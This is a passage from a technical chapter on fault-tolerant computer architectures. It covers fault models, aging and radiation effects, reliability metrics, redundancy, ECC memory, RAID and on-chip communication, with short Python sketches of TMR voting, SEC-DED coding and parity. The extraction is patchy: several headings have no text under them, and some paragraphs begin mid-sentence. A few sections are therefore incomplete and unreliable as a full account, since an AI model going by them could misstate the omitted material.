References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
Abstract
Keywords
Introduction
Fig. 1 Microprocessor scaling trends over time: transistors (thousands), single-thread performance (SpecINT × 10³), frequency (MHz), typical power (Watts), and number of logical cores, with past and present/projected values
of typical electronic systems' life cycle, namely: infant mortality, caused primarily by the premature failure of weak components as a result of manufacturing defects (and exposed by burn-in testing); constant failures due to random faults; and wearout-based faults due to aging. The solid curve in the figure shows the net effect of all three factors. With aggressive technology scaling, the rate of manufacturing defects has increased, resulting in higher infant mortality and higher susceptibility to aging-related faults. As mentioned earlier, the higher soft error rate increases the constant failure rate due to random faults. Further, the increasing power density due to higher clock speeds and parallel processing (in multicore systems) results in accelerated aging. The net result of all these factors is the increased failure rate shown by the dashed bathtub curve in the figure.
The effect of increasing faults can be observed across all types of architecture components – computation, communication and storage – resulting in the degradation of various Quality of Service (QoS) metrics of an application. If unmasked, soft errors in memory elements and interconnects reduce functional reliability. Similarly, degradation in interconnects and logic elements may lead to slower components and hence reduced timing reliability. The lifetime reliability of electronic systems is adversely affected by both aging and permanent faults in the components.
Redundancy has been the primary approach for achieving fault tolerance across the computation stack. It usually involves replicating execution across multiple components (spatial redundancy), re-executing on a single component (temporal redundancy), or adding data (information redundancy) to detect and/or mask faults. The implementation cost and efficacy of each type of redundancy may vary across applications and, given the system's constraints, a subset of such methods may prove infeasible for a particular application. Further, depending upon the application domain, a system may prioritize one or more among functional, timing, and lifetime reliability. For instance, in real-time systems, the timeliness of execution has the highest priority. Similarly, in financial and scientific computations, the accuracy of calculations is more important than the execution time. In systems such as consumer products and space missions, an extended system lifetime may have higher priority. Also, in a system executing multiple applications, each application may have varying criticality w.r.t. each reliability-related performance metric. In this scenario, a uniform approach to fault tolerance can result in under-/overdesign. Therefore, designing fault-tolerant architectures forms an important aspect of application-specific computing.
This chapter briefly covers the various aspects of fault-tolerant architectures
– background, taxonomy, methods, and the state of the art. The rest of the
chapter is organized as follows. Section “Faults, Errors, and Failures” provides a
brief overview of the fault mechanisms followed by a description of the relevant
nomenclature and taxonomy. Section “Fault Tolerance” covers the generic meth-
ods and methodologies involved in fault tolerance. More specific approaches to
fault-tolerant designs for computation, memory/storage, and communication are
presented in sections “Fault-Tolerant Computation”, “Fault-Tolerant Memory/Stor-
age”, and “Fault-Tolerant On-Chip Communication”, respectively. Sections “Fault
Tolerance in Emerging Technologies” and “Cross-Layer Reliability” present more
recent advancements in fault-tolerant architecture w.r.t. emerging technologies
Fault Model
The events in a system related to fault tolerance can be classified as one of failure, error, and fault (Avizienis et al. 2004). An application failure refers to an event where the service delivered by the system deviates from the expected service defined by the application requirements. An error refers to the deviation of the system from a correct service state to an erroneous one. Faults refer to the adjudged or hypothesized cause of an error. The faults in any computing system may be caused either by physical faults affecting the hardware or by imperfect software implementation. For the current chapter, we limit the discussion to physical faults only. A major classification of faults is based on the frequency and persistence of their occurrence:
• Transient Faults occur at a particular time, remain in the system for some period,
and then disappear. Such faults are initially dormant but can become active at any
time. Examples of such faults occur in hardware components that have an adverse
reaction to some external interference, such as electrical fields or radioactivity.
• Intermittent Faults show up in systems from time to time due to some inherent
design issue or aging. An example is a hardware component that is heat-sensitive
– it works for some time, stops working, cools down, and then may start to work
normally again.
• Permanent Faults such as a broken wire or a software design error show a more
persistent behavior than intermittent faults – start at a particular time and remain
in the system until they are repaired.
While the above classification is based on the cause of the physical faults, different fault models are used for investigating the effect of such faults at higher abstractions. Such fault models, the first two of which are illustrated by the sketch after this list, include:
• Stuck-at fault: This is used to model the effect when a memory cell or the
input/output of a logic gate is permanently fixed to a single logic value – stuck-
at-zero or stuck-at-one.
• Single bit-flip fault: This is used to model the transition from one logic value to
another. Such a model can also be used to represent an instance of a bit flip, for
example, as a result of fault injection, or a bit flip within a time window, where
the original logic value is restored after the fault duration.
• Multiple bit-flip fault: This is used to model the logic transition (due to a fault)
across multiple bits. One of the primary use-cases for such models includes
representing faults due to coupling – electric shorts and electromagnetic.
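The stuck-at and bit-flip models map directly onto simple bit manipulation, as the following sketch shows; the helpers are hypothetical utilities of the kind used in fault-injection experiments.

```python
def bit_flip(word: int, pos: int, width: int = 32) -> int:
    # single bit-flip model: toggle one bit of a stored/latched value
    return (word ^ (1 << pos)) & ((1 << width) - 1)

def stuck_at(word: int, pos: int, value: int, width: int = 32) -> int:
    # stuck-at model: the bit reads as a fixed logic value regardless
    # of what was written (stuck-at-one if value else stuck-at-zero)
    word = word | (1 << pos) if value else word & ~(1 << pos)
    return word & ((1 << width) - 1)

assert bit_flip(0b1010, 0) == 0b1011
assert stuck_at(0b1010, 1, 0) == 0b1000
```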
Fault Mechanisms
Several fault mechanisms are responsible for causing one or more of the above types
of faults. The mechanisms of physical faults can be broadly categorized as discussed
below.
External Faults
Investigations into external factors, primarily cosmic radiation, causing anomalous behavior in digital circuits have been reported since 1975 (Binder et al. 1975). Such factors can result in both transient and permanent faults. Transient faults can lead to soft errors, which usually refer to non-reproducible hardware malfunctions. The additional charge induced by external interference (such as alpha particles from radioactive impurities in chip packaging materials, and neutrons generated by cosmic radiation's interaction with the earth's atmosphere) can sometimes change a logic value. As shown in Fig. 3, the interaction of these particles with the silicon lattice, on striking the IC, produces a collected charge which might be sufficient – greater than the critical charge, Qcrit – to change the logical value of the impacted node. While in memory elements the changed value is retained until the next refresh, in combinational circuits the computations are affected only if the wrong value is latched by a memory element.
Permanent faults can be caused by radiation effects such as Single Event Latchup (SEL) and the Total Ionizing Dose (TID) that the device is exposed to. SEL refers to the phenomenon where the passage of a single particle induces the creation of a parasitic bipolar (p-n-p-n) structure shorting power to ground. TID refers to the cumulative long-term ionizing damage due to protons and electrons, and can cause devices to suffer threshold shifts, increased device leakage and power consumption, timing changes, decreased functionality, etc. Although voltage scaling has reduced the probability of occurrence of SELs, the reduced feature sizes in advanced technology nodes and the resulting manufacturing defects have increased the vulnerability to TID (Arzt et al. 1992).
Fig. 3 Charge collection from a charged-particle strike in a CMOS structure (n+ and p+ diffusions, n-well, p-substrate)
Aging/Stress-Induced Faults
The term aging broadly refers to the degradation of semiconductor devices due to
continued electrical stress that may lead to timing failures and reduced operational
life of the IC. The primary physical phenomena causing aging are shown in Fig. 4
and are listed next:
Fig. 4 Aging-related fault mechanisms. (a) HCI in NMOS. (b) TDDB in NMOS. (c) Positive bias
temperature instability (PBTI). (d) Open and short circuit faults due to electromigration. (Source:
W.D. Nix et al. 1992)
Fault Masking
The fault mechanisms discussed above can result in bit flips in memory and/or in some logic node. However, not all faults lead to errors or failures. Faults can eventually lead to application failure only if they are not masked at any stage. The masking of faults (and errors) can be attributed to one or more of the following phenomena.
The fault masking described above refers to implicit phenomena that may occur in a system. Additional fault mitigation methods are usually implemented at multiple abstractions to improve the fault tolerance of the system. Given the implicit fault masking and the fault mitigation methods, Fig. 6 shows the different scenarios that can occur as a result of a hardware fault. As seen in the figure, an error occurs in the system only when a wrong logic value is either read from a storage bit or latched from a gate output and is not mitigated by any error protection mechanism. Similarly, an application failure occurs only when the error is not masked by the application logic and the resulting deviation is beyond the application's tolerance limits. Estimation of the error and failure probabilities of a system is covered in section “Reliability Estimation.”
Fig. 5 Fault Masking: (a) Logical masking in half-adder combinational circuit. (b) Reduced
latching-window masking due to faster clocks
Reliability
Types of Reliability
As shown in Fig. 6, an application’s failure rate is correlated to the application-
specific tolerance to errors and resulting deviation in application behavior. The
type and extent of such tolerances may vary with the application domain and are
characterized by application-specific QoS requirements. The fault tolerance specific
QoS metrics (some of which are shown in Fig. 7) can be categorized as follows:
• Functional Reliability: With rising constant failure rates during the normal life of the system, the chances of such failures manifesting as incorrect computations have also increased. Hence, in applications that require high levels of computational accuracy, such as financial transactions in point-of-sale systems or ATMs and scientific applications, the corresponding QoS can be expressed in terms of functional reliability. It concerns the correctness of the results computed by a system operating in a fault-inducing environment. Functional reliability can be quantified by the probability of no physical fault-induced errors occurring during application execution, or by the Mean Time Between Failures (MTBF).
• Timing Reliability: The performance of the system in terms of the expected timeliness of execution completion can be expressed as its timing reliability. It is used mainly for real-time systems and, depending upon the criticality of the application, can be expressed in terms of Worst-Case Execution Time (WCET), MTBF, probability of completion, or average makespan. WCET is usually used in hard real-time systems, such as pacemakers and automobile safety features, where any instance of missing a deadline can have fatal consequences. MTBF, frequently used in the context of repairable systems, can also be used for expressing the timing reliability of firm real-time systems, such as manufacturing assembly lines, where infrequent failures can be tolerated provided sufficient availability is ensured. Average makespan and probability of completion are usually used in soft real-time systems, such as streaming devices and gaming consoles, where frequent deadline misses can be tolerated as long as they do not affect the user experience.
• Lifetime Reliability: The expected operational life of the system can be characterized by its lifetime reliability. Depending upon whether the system is repairable and the cost of such repairs, metrics such as Mean Time To Detection (MTTD), Mean Time To Failure (MTTF), Mean Time To Crash (MTTC), and availability can be used to characterize the system's lifetime reliability. MTTF refers to the expected time to the first observed failure in the system. In healthcare applications and consumer electronics, the need for a predictable and extended MTTF can be the primary objective. MTTC refers to the expected operational time up to the point at which the system no longer has sufficient resources to ensure the expected behavior, and is usually applicable to repairable systems. In applications with long mission times, such as space exploration, repair of the failed mechanisms is used to extend the MTTC. Repair time, in turn, plays a critical role in high-availability applications such as the automated control of power generation.
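For the constant-failure-rate portion of the bathtub curve, these metrics follow from the exponential reliability model R(t) = exp(-λt) with MTTF = 1/λ. The sketch below, with an assumed failure rate expressed in FIT, illustrates the arithmetic.

```python
import math

FIT = 1e-9  # 1 FIT = one failure per 10^9 device-hours

def reliability(t_hours: float, fit: float) -> float:
    # constant-failure-rate (exponential) model: R(t) = exp(-lambda*t)
    return math.exp(-fit * FIT * t_hours)

def mttf_hours(fit: float) -> float:
    # for a constant failure rate, MTTF = 1 / lambda
    return 1.0 / (fit * FIT)

# e.g., a hypothetical 100-FIT component over a 10-year (87,600 h) mission
print(reliability(87_600, 100), mttf_hours(100))
```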
Reliability Estimation
Estimating the implicit fault masking and the impact of additional fault mitigation measures forms an integral component of designing a fault-tolerant system. While underestimating the impact of faults can lead to unreliable system behavior, overly pessimistic estimations can result in overdesign, eventually leading to infeasible designs in resource-constrained systems. Some of the more widely used reliability estimation approaches are described below. A more detailed overview of reliability estimation can be found in Wang and Chattopadhyay (2017).
Fault Tolerance
computation with additional processing in order to detect and/or mask the effect of errors during computation. Next, we take a brief look at some generic fault tolerance activities and the types of redundancy used to implement them.
The different activities involved in fault tolerance are shown in Fig. 8. Depending
upon the repairability of the system, implementing fault tolerance may involve a
subset of the following:
• Fault avoidance: This usually involves building the system with robust components that are less susceptible to faults. It may also include avoiding system configurations that increase susceptibility to fault mechanisms. For instance, given the impact of Dynamic Voltage Scaling (DVS) on the soft error rate (SER), the designer may choose to avoid configurations with lower supply voltages in high-radiation environments.
• Detection: This is primarily to ascertain whether the computation has been
affected by any kind of faults. Depending upon the implementation, it may incur
timing and/or resource overheads.
• Diagnosis: Unlike detection, diagnosis concerns determining the fault characteristics. This includes finding the type of fault – transient or permanent – locating the component(s) causing the fault, estimating the impact of the fault on application behavior, etc.
• Isolation: This process forms an integral component of repairable systems and
includes eliminating the faulty components from the computation until repair is
completed. In case of permanent faults, this may include finding the components
(or sub-components) that need to be excluded from any future computation.
• Repair: In repairable systems, fault tolerance may include allowing the affected
components to recover partially/completely to their operational states. For
instance, it may include reducing the workload on faster aging components to
reduce thermal stress.
• Recovery: While repair usually concerns the components of the system, recovery
primarily concerns the application execution. It can range from the mitigation of
any detected faults/errors to resetting the system from a hang state.
Redundancy
functional reliability but may adversely affect the lifetime reliability owing to
the parallel execution and resulting higher thermal stress. Spatial redundancy for
improving the lifetime reliability usually involves using cold spares.
• Temporal Redundancy involves re-executing the computation workload on the same hardware module. As shown in Fig. 12a, it may include complete re-execution when an error is detected at the end of the computation. Similarly, with parallel error detection, the re-execution may start from different points, depending on where the error occurred, as shown in Fig. 12b. Figure 12c shows the more widely used method of checkpointing with rollback recovery. In the context of matrix multiplication, it may involve creating checkpoints after the computation of each row of the output matrix, such that any re-execution can begin by restoring the stored checkpoint. The functional reliability of such methods is usually determined by the accuracy of the detection methods. As shown in Fig. 13, the timing reliability of temporal redundancy-based methods requires more complex estimation approaches, as the execution time is nondeterministic in such cases. Since temporal redundancy usually results in increased computation per unit workload, it eventually leads to a lower operational lifetime.
• Information Redundancy involves computing additional data points in order to detect and/or recover from errors in computation. For instance, as shown in Fig. 13, the input matrices are augmented with their column and row checksums, resulting in the larger operands Acc and Brc, respectively. Correspondingly, the output matrix is a full checksum version of the original output matrix, Cfc (see the sketch after this list). As a result, it requires (N + 1)² operations instead of N² and therefore adversely affects both the timing and lifetime reliability.
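The checksum scheme described above (often called algorithm-based fault tolerance, ABFT) can be sketched as follows; integer arithmetic is assumed so that exact equality checks suffice, whereas floating point would need tolerance thresholds.

```python
def add_column_checksum(A):
    # Acc: append a row holding the sum of each column
    return A + [[sum(col) for col in zip(*A)]]

def add_row_checksum(B):
    # Brc: append to each row its row sum
    return [row + [sum(row)] for row in B]

def matmul(X, Y):
    return [[sum(x * y for x, y in zip(row, col)) for col in zip(*Y)]
            for row in X]

def abft_matmul(A, B):
    # Cfc = Acc * Brc is a full-checksum version of A * B
    C_fc = matmul(add_column_checksum(A), add_row_checksum(B))
    # consistency of every row/column sum detects (and helps locate)
    # an erroneous element of the product
    for row in C_fc:
        assert sum(row[:-1]) == row[-1], "row checksum mismatch: fault"
    for col in zip(*C_fc):
        assert sum(col[:-1]) == col[-1], "column checksum mismatch: fault"
    return [row[:-1] for row in C_fc[:-1]]

assert abft_matmul([[1, 2], [3, 4]], [[5, 6], [7, 8]]) == [[19, 22], [43, 50]]
```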
Fault-Tolerant Computation
The fault mechanisms described in section “Faults, Errors, and Failures” can result
in errors in computation and reduced system lifetime. We describe the methods
for improving fault tolerance in computation under three categories. Single-core
computing includes all methods that can improve reliability of a single Processing
Element (PE). The methods that take advantage of the presence of multiple PEs
on the architecture are described under multicore computing. The reconfigurable
computing subsection describes specialized methods applicable to reconfigurable
architectures – FPGA and Coarse-Grained Reconfigurable Arrays (CGRA).
Single-Core Computing
Tolerance techniques for soft errors in computation circuits primarily involve some form of execution redundancy – either spatial or temporal. Implementing Dual Modular Redundancy (DMR) provides only fault/error detection, while Triple Modular Redundancy (TMR) provides masking of any single fault/error. In terms of cost, TMR can result in more than 200% area and power overheads. Area and power overheads of a LEON3 core with varying levels of TMR in the pipeline, cache, and register file are reported in Kriebel et al. (2014). Corresponding results for an FPGA-based implementation of LEON3 are presented in Wirthlin et al. (2016). In both cases, power and area overheads of more than 200% are observed. Circuit-level fault masking usually involves circuit hardening by using multiple flip-flops or by gate resizing. Multiple flip-flop-based designs use scan-flops already present in the circuit to provide error tolerance. Gate resizing involves using bigger transistors to provide better tolerance against radiation-induced soft errors. More flexible methods, presented in Mohanram and Touba (2003) and Rao et al. (2006), use partial replication based on profiling results to obtain reduced coverage at lower power and area overheads. Similarly, low-overhead methods based on circuit monitoring enable low-cost and configurable fault detection.
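The masking step of TMR reduces to a majority vote over the three replica outputs, as in this minimal sketch; bitwise voting over machine words is one common, hardware-friendly choice.

```python
def tmr_vote(a: int, b: int, c: int) -> int:
    # bitwise majority of three replica outputs: any single faulty
    # replica is outvoted, masking the error without detection latency
    return (a & b) | (b & c) | (a & c)

assert tmr_vote(0b1010, 0b1010, 0b0110) == 0b1010  # one corrupted copy
```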
At the architecture level, the granularity of execution replication provides the
trade-off in error resilience and associated overheads. The granularity may vary
from a single module like the pipeline (Austin 1999; Slegel et al. 1999) to an
entire core in chip multiprocessors (Mukherjee et al. 2002). Time redundancy-
based techniques like redundant multi-threading are also used. Some fault detection
methods involve manipulating the pipeline (Blaauw et al. 2008) to detect both
transient and intermittent faults. Similar to the circuit level, symptom- or assertion-monitoring-based detection methods provide incomplete coverage at very low overheads. The symptoms include exceptions, control-flow mis-speculations, and cache or translation look-aside buffer misses.
In addition to the uniform protection schemes discussed above, opportunistic protection schemes aim to use underutilized resources to insert redundant execution for critical portions of the computation. Wang et al. (2013) present two protection schemes: an aggressive scheme that achieves redundant execution for all protected instructions while incurring high overheads, and an opportunistic scheme that replicates protected instructions only if there are NOP instructions around them, thereby incurring zero penalty.

A × N1 ± A × N2 = A × (N1 ± N2)
(N1 ⊗ N2) mod A = ((N1 mod A) ⊗ (N2 mod A)) mod A        (1)
Some code-based methods are also used at the architecture level to provide concurrent fault detection and masking at lower area overheads. These methods, based on AN codes (Rao 1974), rest on the principle of providing a redundant representation of numbers such that the result of an operation on them can be analyzed to detect and correct errors. As shown in Eq. (1), some operations preserve certain properties of the operands. Such operations are performed on the operands as well as on the result, and the outcomes can be compared for detection and sometimes correction. However, such methods are very application-specific and require a high design effort.
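As an illustration of the residue identity in Eq. (1), the following sketch checks a multiplication against an assumed check modulus A; the value 3 is arbitrary, and practical codes choose A for error coverage and cheap modulo logic.

```python
A = 3  # illustrative check modulus for a residue (AN-style) code

def checked_mul(n1: int, n2: int) -> int:
    # the residue of the product must match the product of the
    # residues (mod A); a mismatch flags a fault in the datapath
    result = n1 * n2
    if result % A != (n1 % A) * (n2 % A) % A:
        raise RuntimeError("residue check failed: fault detected")
    return result
```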
Multicore Computing
• Core level: This involves parallel execution on two separate cores and com-
parison of the results to detect/mask any faults/errors. The coupling between
the cores can range from tight lockstepping (Shubu 2008), which requires
synchronized execution on similar cores, to loosely synchronized execution
across heterogeneous cores. Such methods require additional hardware structures
to ensure the synchronizations and enforce hardware-level determinism.
• Simultaneous and Redundant Threading (SRT): SRT-based methods leverage the
Simultaneous Multi-threading (SMT) of the cores to implement asynchronous
execution of redundant threads and remove the resource conflict of more tight
lockstepping methods. Architectural features such as load-value-queue, store
buffer, slack-fetch of caches, and branch outcome queues are used to improve
the performance of such methods (Sorin 2009).
• Redundant multi-threading: Software-based Redundant Multi-threading (SRMT)
approaches involve compiler-based methods that use leading and trailing threads,
created by the compiler, to provide redundant execution. It usually involves
compiler transformations such as function and input replication. Although
primarily a software-based method, architectural enhancements such as hardware
message queues can be used to improve the performance.
• Process-level: Such techniques involve replication of the whole process. Although purely software-based, on multicore systems this approach enables parallel execution of the replicated processes and reduces the timing overheads.
Reconfigurable Computing
Fault-Tolerant Memory/Storage
Information redundancy in the form of additional bits for ECC is commonly used
for both Static Random Access Memory (SRAM)-based caches and Dynamic
Random Access Memory (DRAM)-based main memory. Hamming or Hsiao code-
based Single-bit-Error-Correcting (SEC) and Double-bit-Error-Detecting (DED)
codes are usually sufficient for most systems (Hamming 1950; Hsiao 1970). More
robust methods such as Double-bit-Error-Correcting (DEC) and Triple-bit-Error-
Detecting (TED) codes can be used for higher resilience against random bit errors.
Reed-Solomon codes (Reed and Solomon 1960) and Single-Nibble-error-Correcting
(SNC) and Double-Nibble-error-Detecting (DND) codes are usually used for protection
against multiple-bit burst errors. The granularity of ECC implementation provides the trade-
off between resilience and storage overhead. Table 1 shows the storage overheads
associated with some ECC implementations.
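As a concrete illustration of SEC-DED, the following minimal sketch implements a Hamming(7,4) code extended with an overall parity bit; the bit layout and helper names are illustrative assumptions rather than any particular memory controller's implementation.

    # A minimal sketch of SEC-DED using a Hamming(7,4) code extended with an
    # overall parity bit (an (8,4) code). Bit positions follow the classic
    # Hamming layout.

    def secded_encode(d1, d2, d3, d4):
        """Encode 4 data bits into an 8-bit SEC-DED codeword."""
        p1 = d1 ^ d2 ^ d4              # covers positions 1, 3, 5, 7
        p2 = d1 ^ d3 ^ d4              # covers positions 2, 3, 6, 7
        p3 = d2 ^ d3 ^ d4              # covers positions 4, 5, 6, 7
        cw = [p1, p2, d1, p3, d2, d3, d4]
        p0 = 0
        for b in cw:                   # overall parity enables double-error
            p0 ^= b                    # detection on top of SEC
        return cw + [p0]

    def secded_decode(cw):
        """Return (data_bits, status); status is 'ok', 'corrected', or 'double'."""
        p1, p2, d1, p3, d2, d3, d4, p0 = cw
        s1 = p1 ^ d1 ^ d2 ^ d4
        s2 = p2 ^ d1 ^ d3 ^ d4
        s3 = p3 ^ d2 ^ d3 ^ d4
        syndrome = s1 | (s2 << 1) | (s3 << 2)    # 1-indexed error position
        overall = 0
        for b in cw:
            overall ^= b
        if syndrome == 0 and overall == 0:
            status = 'ok'
        elif overall == 1:                       # odd flips: a single error
            if syndrome:
                cw[syndrome - 1] ^= 1            # correct the flagged bit
            else:
                cw[7] ^= 1                       # the extra parity bit flipped
            status = 'corrected'
        else:                                    # even flips, nonzero syndrome
            status = 'double'                    # detected but uncorrectable
        return [cw[2], cw[4], cw[5], cw[6]], status

    cw = secded_encode(1, 0, 1, 1)
    cw[5] ^= 1                                   # inject a single-bit error
    print(secded_decode(cw))                     # -> ([1, 0, 1, 1], 'corrected')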
Cache/On-chip SRAM
In caches, the write-policy determines the amount of correction capabilities that can
be implemented. For a write-through policy, the access granularity at Last Level
Cache (LLC) from Level 1 (L1) cache is a word, and hence the ECC granularity
at LLC should be a single word. However, for a write-back policy of the L1 cache, the
LLC access is a full L1 cache line and, therefore, allows a coarser ECC granularity
(a larger ECC word) with reduced storage overheads. Additional tolerance can be provided by interleaving more
ECC codes within the cache line, albeit with more overheads.
Main Memory/DRAM
Most systems use commodity DRAM devices for main memory in Dual in-line-
Memory Module (DIMM) or Small Outline DIMM (SODIMM) form factors.
ECC DIMMs provide SEC-DED for each DRAM rank and have higher overheads
compared to non-ECC DIMMs. More recent methods have been developed to
provide fault tolerance against permanent faults in one or more chips on a DIMM.
Such Chipkill-correct techniques spread the DRAM access over multiple chips and
use single-symbol error-correcting and double-symbol error-detecting codes for
error correction. Adaptive methods of ECC like Virtualized ECC (Yoon and Erez
2010) and Bamboo codes (Kim et al. 2015) provide flexible and tunable approaches
to main memory fault tolerance. Such techniques can be used to find appropriate
trade-offs in cross-layer design approaches. Virtualized ECC uses a scheme where
the redundancy information for error detection and correction is stored separately
and the correcting information is accessed only in case of a detected error. This
reduces the overall power consumption and enables effective error correction and
Chipkill-correction for both ECC and non-ECC DIMMs with low overheads.
Storage
With the emergence of data-centric applications such as data analytics and AI/ML,
highly reliable storage systems have become indispensable. Unlike the main
memory and cache/on-chip SRAM, the reliability requirements in storage systems
are expressed from the perspective of data durability and availability. The faults
found in local storage media can be categorized into three types. Whole-disk
failures correspond to situations when a complete storage unit becomes unusable.
Latent Sector Errors (LSEs) correspond to the unreachability of select sectors
of the storage medium for read/write requests of the application. Undetected Disk
Errors (UDEs) cannot be repaired by the disk and are only detectable when a read
is issued for the affected sector. Correspondingly, the metrics Mean Time to Data
Loss (MTTDL) and availability are usually used for quantifying the fault tolerance
of storage systems.
Depending upon the type of device used for storage, Hard Disk Drive (HDD)
or Solid-state Drive (SSD), specialized fault tolerance measures may be imple-
mented (Kim et al. 2019). However, redundant storage is primarily used for
improving fault tolerance, and the implementation can be one of the following
methods:
• N-fold data replication: The data is replicated across N-storage targets, and data
loss occurs only if the data is corrupted on all storage targets. Evidently, in spite
of being highly reliable, this method incurs very high costs.
• K-out-of-N erasure coding: This usually involves implementing some form of
information redundancy to transform data of K symbols into N (> K) symbols.
The transformation ensures recovery of the data from a subset of the N symbols;
a minimal single-parity instance is sketched after this list.
• Redundant Array of Inexpensive Disks (RAID): First proposed by Patterson et al.
(1988), this involves using multiple physical disk drive components into one or
more logical units for improving reliability and/or performance. Depending on
the RAID level, one of several schemes may be implemented to satisfy varying
QoS requirements: fault tolerance, availability, performance, and capacity. The
reliability estimation models for the schemes can be found in Chen et al. (1994).
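The single-parity sketch below illustrates the simplest K-out-of-N instance (N = K + 1, XOR parity, as in RAID 4/5); block contents and names are illustrative.

    # A minimal sketch of single-parity protection in the style of RAID 4/5:
    # one XOR parity block protects K data blocks, so any single lost block
    # can be rebuilt from the survivors.

    def xor_parity(blocks):
        """XOR of K equal-sized blocks; doubles as the rebuild operation."""
        out = bytearray(len(blocks[0]))
        for block in blocks:
            for i, b in enumerate(block):
                out[i] ^= b
        return bytes(out)

    data = [b"disk0blk", b"disk1blk", b"disk2blk"]   # K = 3 data blocks
    parity = xor_parity(data)                        # stored on a fourth disk
    lost = data.pop(1)                               # simulate losing disk 1
    rebuilt = xor_parity(data + [parity])            # XOR of survivors + parity
    print(rebuilt == lost)                           # -> True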
Storage overhead and power are the cost factors associated with design of a
resilient memory system. Flexible error protection methods can enable adaptation
to system-level requirements, both at design time and run-time. In summary,
ECC granularity and fault coverage provide the tunable parameters, and the memory
controller provides the tuning knob, for varying error protection levels based on
system requirements.
Fault-Tolerant Communication
Error detection methods in NoCs include delay sampling for transient faults, and
BIST and inline testing for permanent faults. Similarly, the ACK and NACK signals
are used in the transport layer to detect errors in transmission. Temporal redundancy-
based transient fault mitigation methods for communication include multi-sampling
and hop-to-hop retransmission. Similarly, techniques for permanent and intermittent
fault mitigation include split-link transmission schemes, where a partially faulty
link is used for transmission along with other partially or fully functional links.
Similarly, a methodology for improving the lifetime of the communication links is
proposed by Das et al. (2013). The proposed method involves joint optimization of
the system lifetime of NoC and the processors. Information redundancy-based fault
mitigation methods are similar to those used for fault-tolerant memory. However,
extra protection is used for the more critical header information of a packet.
Forward error correction with block codes and convolutional codes are used for
improving the reliability of end-to-end communication. Similarly, probabilistic
routing techniques like flooding, gossip flooding, and directed flooding use packet
replication and routing across multiple paths to increase the probability of correct
transmission. Further, spatial redundancy for communication usually involves using
additional and spare wires for transmission (Kakoee et al. 2011).
In addition to the computation, communication, and storage-related fault toler-
ance methods described above, multiple works have explored the fault tolerance
in uncore components. Specifically, the Level 2 Cache controllers, the DRAM
controllers, crossbar interconnects, and PCI Express I/O controller are studied
in Cho et al. (2017) for their impact on application failures due to faults. In
addition, Cho et al. (2017) propose replay recovery techniques to reduce the effect
of soft errors in uncore components by more than 50× with minimal impact on
chip-level area and power overheads.
Cross-Layer Reliability
Fig. 17 Redundancy methods across layers. Cross-layer Reliability (CLR) implementation across
hardware (HW), System Software (SSW), and Application Software (ASW) (Sahoo 2019)
Signal Processing
Signal processing applications usually involve the acquisition of and computation on
real-world information, which has some level of built-in noise. Further, the output
of such applications, image processing in particular, is usually consumed by human
perception, which has its own limitations. Therefore, multiple works have leveraged
computing paradigms such as approximate computing and precision scaling to
provide low overhead fault tolerance. Shim et al. (2004) presented a method of using
a reduced precision replica, whose output could be used as the corrected output in
case of errors in the original system. Shim and Shanbhag (2006) introduced soft
error-tolerant Digital Signal Processing (DSP) by using low complexity estimators
of the main DSP block, thereby reducing the overheads of redundancy methods
considerably. Biasielli et al. (2022) use the concept of usefulness instead of
correctness of output images to design efficient Convolutional Neural Networks
(CNN)-based fault detection. The authors use the CNN-based fault detection along
with approximate computing based replicated execution to provide low overhead
fault tolerance in a camera image acquisition system. Similarly, Schmidt and French
(2013) proposed a combination of HW/SW fault tolerance by using Radiation
Hardening by Software (RHBSW) techniques.
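As an illustration of the reduced-precision-replica idea, the sketch below bounds the output of a toy FIR kernel with a coarsely quantized copy; the kernel, quantization step, and threshold are illustrative assumptions, not the original authors' design.

    # A minimal sketch of reduced-precision-replica (RPR) error detection in
    # the spirit of Shim et al. (2004): a cheap, coarsely quantized copy of a
    # DSP kernel bounds the full-precision result, and its output replaces a
    # result that deviates too far.

    def fir(samples, coeffs):
        """Full-precision FIR tap sum (the 'main' DSP block)."""
        return sum(s * c for s, c in zip(samples, coeffs))

    def fir_replica(samples, coeffs, bits=4):
        """Reduced-precision replica with coarsely quantized operands."""
        q = lambda x: round(x * (1 << bits)) / (1 << bits)
        return sum(q(s) * q(c) for s, c in zip(samples, coeffs))

    def rpr_output(samples, coeffs, threshold=0.5):
        main = fir(samples, coeffs)
        replica = fir_replica(samples, coeffs)
        # A soft error in the main block shows up as a large deviation from
        # the replica; the replica then serves as the corrected output.
        return main if abs(main - replica) <= threshold else replica

    print(rpr_output([0.3, -0.7, 0.1], [0.25, 0.5, 0.25]))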
Wireless Communication
Wireless Sensor Networks (WSNs) have emerged as a promising candidate solution
for providing ambient intelligence. WSNs include Sensor Nodes (SNs) that monitor
the physical environment to provide the observations for various cyberphysical sys-
tems. Consequently, the SNs are usually deployed in harsh environments that may
result in reliability issues with an SN’s sensing, computation, and communication
functions. Overall, faults in an WSN may arise from node-, sink-, network-
level (Effah and Thiare 2018). The corresponding fault tolerance approaches
include centralized, decentralized, and hybrid approaches with varying trade-offs
in reliability and communication costs (Adday et al. 2022). Using traditional
redundancy-based methods for computation, on SNs, gateways, and base-station,
and retransmission using additional links for communication would incur large
costs. A cross-layer approach to fault management in WSNs is presented by Vihman
et al. (2020). The presented approach aims to eliminate any form of hardware and
temporal redundancy and, instead, uses the data gathered by the various levels –
SNs at the Edge, gateways at the Fog and the Cloud – to detect and isolate the faults.
Since the SNs are usually resource-constrained systems that aim to minimize energy
consumption, such cross-layer reliability approaches can be used to ensure high
availability with minimal resource overheads resulting from duplicated execution.
Fault Tolerance in Emerging Technologies
The last two decades have witnessed exponential growth in the application areas
using electronic systems. Much of this growth has been fuelled by emerging
technologies – both in terms of new devices beyond Complementary Metal-Oxide
Semiconductor (CMOS) and novel computing paradigms such as AI/ML, IoT, etc.
In this section, we provide an overview of reliability issues and fault tolerance across
some emerging technologies.
DRAM has long been the substrate of choice for architecting main memory subsystems
due to its low cost per bit. However, DRAM is a fundamental performance
and energy bottleneck in almost all computer systems (Wulf and McKee 1995)
and is experiencing significant technology scaling challenges. DRAM-compatible
emerging nonvolatile memory (NVM) technologies such as Flash, oxide-based
Resistive RAM (OxRRAM), phase-change memory (PCM), and spin transfer torque
or spin orbit torque magnetic RAM (STT/SOT-MRAM) can address some of
9 Fault Tolerant Architectures 305
these challenges (Mutlu 2013). Apart from their use as DRAM alternatives in
conventional computing, NVMs are now used in neuromorphic computing (Mead
1990), which are analog computing systems (hardware) that mimic the brain’s archi-
tecture. Recent demonstrations include the use of OxRRAM (Mallik et al. 2017),
